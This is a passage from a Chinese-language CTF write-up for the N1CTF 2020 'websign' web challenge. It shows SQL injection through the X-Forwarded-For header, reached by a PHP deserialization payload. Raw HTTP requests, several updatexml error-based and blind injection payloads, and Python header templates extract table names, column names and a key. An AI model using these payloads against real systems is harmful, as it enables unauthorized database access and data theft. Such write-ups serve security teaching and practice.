在$sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());这段代码位置可能存在sql注入,可以通过构造反序列化先到这一步
X-Forwarded-For: 1.1.1.1' and updatexml(1,if((1=2),1,concat(0x3a,database())),1) and '1'='
此时if判断为false,语句执行了INSERT into n1ip(`ip`,`time`) VALUES ('1.1.1.1' and updatexml(1,concat(0x3a,database()),1) and '1'='',time()),后端sql报错信息大概是XPATH syntax error: ':n1ctf_websign',错误信息返回给了flag类的$this->ip,从报错信息当中匹配到了n1ctf,于是这里输出了welcome to n1ctf2020
为了方便理解,可以看下面两张图:
接着盲注,首先获取表名
1
2
3
4
5
6
7
8
9
10
GET /index.php?input=O:4:%22flag%22:1:{s:2:%22ip%22;O:2:%22ip%22:0:{}} HTTP/1.1
Host: 101.32.205.189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
X-Forwarded-For: 1.1.1.1' and updatexml(1,if(((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=10),1,concat(0x3a,database())),1) and '1'='
X-Forwarded-For: 1.1.1.1' and updatexml(1,if(((select table_name from information_schema.tables where table_schema=database() limit 1,1)='n1key'),1,concat(0x3a,database())),1) and '1'='
获取n1key表当中的列名
1
2
3
4
5
6
7
8
9
10
GET /index.php?input=O:4:%22flag%22:1:{s:2:%22ip%22;O:2:%22ip%22:0:{}} HTTP/1.1
Host: 101.32.205.189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
X-Forwarded-For: 1.1.1.1' and updatexml(1,if(((select length(group_concat(column_name)) from information_schema.columns where table_name='n1key')=6),1,concat(0x3a,database())),1) and '1'='
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"max-age=0","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0","Connection":"close","X-Forwarded-For":"1.1.1.1' and updatexml(1,if(((select ascii(substr(group_concat(column_name),{},1)) from information_schema.columns where table_name='n1key')={}),1,concat(0x3a,database())),1) and '1'='".format(i,j),"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate"}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"max-age=0","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0","Connection":"close","X-Forwarded-For":"1.1.1.1' and updatexml(1,if(((select substr(`key`,{},1) from n1key)='{}'),1,concat(0x3a,database())),1) and '1'='".format(i,j),"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate"}